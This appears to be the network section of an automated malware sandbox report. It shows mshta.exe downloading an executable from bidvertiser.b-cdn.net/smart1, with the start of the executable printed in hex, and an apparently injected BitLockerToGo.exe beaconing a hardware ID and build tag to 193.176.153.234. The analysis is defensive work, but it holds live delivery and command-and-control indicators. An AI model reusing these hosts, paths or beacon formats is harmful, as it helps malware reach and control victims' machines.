                                  Aug 10, 2024 19:10:11.751703978 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.751805067 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.751806021 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.751806021 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.751872063 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.778511047 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.778569937 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.778665066 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.778666019 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.778732061 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.778769970 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.778831959 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.778856993 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.778887033 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.778920889 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.779007912 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.779048920 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.779078960 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.779092073 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.779120922 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.779305935 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.779356956 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.779381990 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.779393911 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.779437065 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.779519081 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.779561043 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.779599905 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.779613018 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.779643059 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.779757023 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.779805899 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.779825926 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.779836893 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.779870987 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.832503080 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.845931053 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.846000910 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.846151114 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.846210957 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.846205950 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.846205950 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.846277952 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.846327066 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.846327066 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.871529102 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.871611118 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.871776104 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.871776104 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.871776104 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.871824026 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.871855974 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.871861935 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.871917963 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.871917963 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.872059107 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.872101068 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.872148991 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.872180939 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.872216940 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.872243881 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.872271061 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.872314930 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.872383118 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.872400999 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.872426033 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.872448921 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.872452974 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.872503996 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.872526884 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.872553110 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.872555971 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.872575045 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.872610092 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.872642994 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.872878075 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.872920990 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.872952938 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.872962952 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.872991085 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.873011112 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.938236952 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.938301086 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.938450098 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.938465118 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.938499928 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.938520908 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.938529968 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.938566923 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.966921091 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.966976881 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.967170954 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.967189074 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.967189074 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.967222929 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.967257023 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.967258930 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.967351913 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.967494965 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.967540026 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.967694044 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.967742920 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.967753887 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.967753887 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.967818022 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.967868090 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.967868090 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.967890024 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.967926979 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.967962980 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.967978954 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.968012094 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.968034029 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.968096972 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.968120098 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:11.968132019 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:11.968168974 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:12.019870043 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:12.032604933 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.032664061 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.032793999 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.032846928 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.032865047 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:12.032865047 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:12.032865047 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:12.032931089 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.032982111 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:12.056556940 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.056615114 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.056687117 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:12.056757927 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.056797981 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:12.057226896 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.057276011 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.057295084 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:12.057308912 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.057354927 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:12.059461117 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.059504032 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.059541941 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:12.059560061 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.059585094 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:12.059585094 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:12.059674025 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.059724092 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.059756994 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:12.059768915 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.059803963 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:12.060200930 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.060244083 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.060272932 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:12.060285091 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.060353994 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:12.060518026 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.060563087 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.060592890 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:12.060609102 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.060633898 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:12.060633898 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:12.113612890 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:12.124748945 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.124814034 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.124886990 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:12.124954939 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.124988079 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.124990940 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:12.125025988 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:12.125037909 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.125082016 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:12.125091076 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.125118971 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:12.125129938 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.125161886 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:12.125206947 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:12.150016069 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.150075912 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.150312901 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:12.150312901 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:12.150377989 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.150470018 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.150532961 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.150779963 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:12.150840998 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.150957108 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:12.152014017 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.152081966 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.152177095 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:12.152178049 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:12.152242899 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.152303934 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:12.152304888 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.152334929 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.152369022 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:12.152385950 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.152414083 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:12.152426958 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.152461052 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:12.152502060 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:12.152528048 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.152578115 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.152610064 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:12.152621984 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.152650118 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:12.152676105 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:12.152967930 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.153019905 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.153047085 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:12.153058052 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.153086901 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:12.153110027 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:12.217231035 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.217295885 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.217438936 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.217442036 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:12.217442989 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:12.217504978 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.217547894 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.217565060 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:12.217565060 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:12.217586040 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.217614889 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:12.217658043 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:12.244774103 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.244834900 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.244910002 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:12.244976044 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.245011091 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.245016098 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:12.245033979 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:12.245054007 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.245089054 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:12.245095968 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.245229006 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.245254040 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:12.245266914 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.245321035 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:12.245384932 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:12.245395899 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:12.245465040 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:12.268965006 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:28.813544989 CEST4974380192.168.2.4193.176.153.234
                                  Aug 10, 2024 19:10:28.818767071 CEST8049743193.176.153.234192.168.2.4
                                  Aug 10, 2024 19:10:28.818948030 CEST4974380192.168.2.4193.176.153.234
                                  Aug 10, 2024 19:10:28.820652008 CEST4974380192.168.2.4193.176.153.234
                                  Aug 10, 2024 19:10:28.825565100 CEST8049743193.176.153.234192.168.2.4
                                  Aug 10, 2024 19:10:29.483603001 CEST8049743193.176.153.234192.168.2.4
                                  Aug 10, 2024 19:10:29.483755112 CEST4974380192.168.2.4193.176.153.234
                                  Aug 10, 2024 19:10:29.525382042 CEST4974380192.168.2.4193.176.153.234
                                  Aug 10, 2024 19:10:29.530407906 CEST8049743193.176.153.234192.168.2.4
                                  Aug 10, 2024 19:10:37.251897097 CEST8049743193.176.153.234192.168.2.4
                                  Aug 10, 2024 19:10:37.251996994 CEST4974380192.168.2.4193.176.153.234
                                  Aug 10, 2024 19:10:38.927896976 CEST4974380192.168.2.4193.176.153.234

                                  UDP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Aug 10, 2024 19:10:01.495141983 CEST5384653192.168.2.41.1.1.1
                                  Aug 10, 2024 19:10:01.507226944 CEST53538461.1.1.1192.168.2.4

                                  DNS Queries

                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Aug 10, 2024 19:10:01.495141983 CEST192.168.2.41.1.1.10xf82fStandard query (0)bidvertiser.b-cdn.netA (IP address)IN (0x0001)false

                                  DNS Answers

                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Aug 10, 2024 19:10:01.507226944 CEST1.1.1.1192.168.2.40xf82fNo error (0)bidvertiser.b-cdn.net185.93.1.250A (IP address)IN (0x0001)false

                                  HTTP Request Dependency Graph

                                  • bidvertiser.b-cdn.net
                                  • 193.176.153.234

                                  HTTP Packets

                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.449743193.176.153.234807916C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                  TimestampBytes transferredDirectionData
                                  Aug 10, 2024 19:10:28.820652008 CEST90OUTGET / HTTP/1.1
                                  Host: 193.176.153.234
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Aug 10, 2024 19:10:29.483603001 CEST170INHTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Sat, 10 Aug 2024 17:10:29 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 0
                                  Connection: keep-alive
                                  Aug 10, 2024 19:10:29.525382042 CEST412OUTPOST /587ec30955d49a9c.php HTTP/1.1
                                  Content-Type: multipart/form-data; boundary=----BGHJJDGHCBGDHIECBGID
                                  Host: 193.176.153.234
                                  Content-Length: 210
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Data Raw: 2d 2d 2d 2d 2d 2d 42 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 37 45 44 33 43 31 39 30 41 43 32 32 33 31 32 30 32 37 36 32 36 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 63 72 33 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 2d 2d 0d 0a
                                  Data Ascii: ------BGHJJDGHCBGDHIECBGIDContent-Disposition: form-data; name="hwid"27ED3C190AC22312027626------BGHJJDGHCBGDHIECBGIDContent-Disposition: form-data; name="build"cr3------BGHJJDGHCBGDHIECBGID--
                                  Aug 10, 2024 19:10:37.251897097 CEST178INHTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Sat, 10 Aug 2024 17:10:37 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 8
                                  Connection: keep-alive
                                  Data Raw: 59 6d 78 76 59 32 73 3d
                                  Data Ascii: YmxvY2s=


                                  HTTPS Proxied Packets

                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.449730185.93.1.2504437172C:\Windows\System32\mshta.exe
                                  TimestampBytes transferredDirectionData
                                  2024-08-10 17:10:02 UTC331OUTGET /smart1 HTTP/1.1
                                  Accept: */*
                                  Accept-Language: en-CH
                                  UA-CPU: AMD64
                                  Accept-Encoding: gzip, deflate
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                  Host: bidvertiser.b-cdn.net
                                  Connection: Keep-Alive
                                  2024-08-10 17:10:02 UTC637INHTTP/1.1 200 OK
                                  Date: Sat, 10 Aug 2024 17:10:02 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 166102
                                  Connection: close
                                  Server: BunnyCDN-IL1-941
                                  CDN-PullZone: 2426042
                                  CDN-Uid: 4ec946d1-7652-4f1a-8e05-bff5e7098a3d
                                  CDN-RequestCountryCode: US
                                  Cache-Control: public, max-age=2592000
                                  Last-Modified: Sat, 10 Aug 2024 07:21:49 GMT
                                  CDN-StorageServer: NY-346
                                  CDN-FileServer: 622
                                  CDN-ProxyVer: 1.04
                                  CDN-RequestPullSuccess: True
                                  CDN-RequestPullCode: 206
                                  CDN-CachedAt: 08/10/2024 09:53:20
                                  CDN-EdgeStorageId: 1069
                                  CDN-Status: 200
                                  CDN-RequestId: 83cab67edb2c1567f00eb01f0d6a10a5
                                  CDN-Cache: HIT
                                  Accept-Ranges: bytes
                                  2024-08-10 17:10:02 UTC1448INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 57 56 1e fb 13 37 70 a8 13 37 70 a8 13 37 70 a8 c0 45 75 a9 12 37 70 a8 c0 45 73 a9 12 37 70 a8 c0 45 74 a9 06 37 70 a8 c0 45 71 a9 1c 37 70 a8 13 37 71 a8 96 37 70 a8 c0 45 78 a9 11 37 70 a8 c0 45 8f a8 12 37 70 a8 c0 45 72 a9 12 37 70 a8 52 69 63 68 13 37 70 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 47 0e aa c5 00 00 00 00 00 00 00 00 e0 00 02
                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$WV7p7p7pEu7pEs7pEt7pEq7p7q7pEx7pE7pEr7pRich7pPELG
                                  2024-08-10 17:10:02 UTC16384INData Raw: 00 00 00 00 50 00 72 00 65 00 66 00 65 00 72 00 72 00 65 00 64 00 20 00 41 00 64 00 64 00 72 00 65 00 73 00 73 00 00 00 4c 00 6f 00 63 00 61 00 6c 00 5c 00 44 00 69 00 61 00 6c 00 65 00 72 00 73 00 49 00 76 00 65 00 42 00 65 00 65 00 6e 00 53 00 74 00 61 00 72 00 74 00 65 00 64 00 4d 00 75 00 74 00 65 00 78 00 00 00 00 00 4e 00 75 00 6d 00 62 00 65 00 72 00 25 00 64 00 00 00 00 00 4e 00 61 00 6d 00 65 00 25 00 64 00 00 00 00 00 4c 00 61 00 73 00 74 00 20 00 64 00 69 00 61 00 6c 00 65 00 64 00 20 00 25 00 64 00 00 00 00 00 4d 00 61 00 69 00 6e 00 20 00 57 00 69 00 6e 00 64 00 6f 00 77 00 20 00 4c 00 65 00 66 00 74 00 2f 00 54 00 6f 00 70 00 00 00 00 00 4e 00 75 00 6d 00 62 00 65 00 72 00 00 00 00 00 25 00 73 00 25 00 64 00 00 00 00 00 4c 00 69 00 6e 00 65
                                  Data Ascii: Preferred AddressLocal\DialersIveBeenStartedMutexNumber%dName%dLast dialed %dMain Window Left/TopNumber%s%dLine
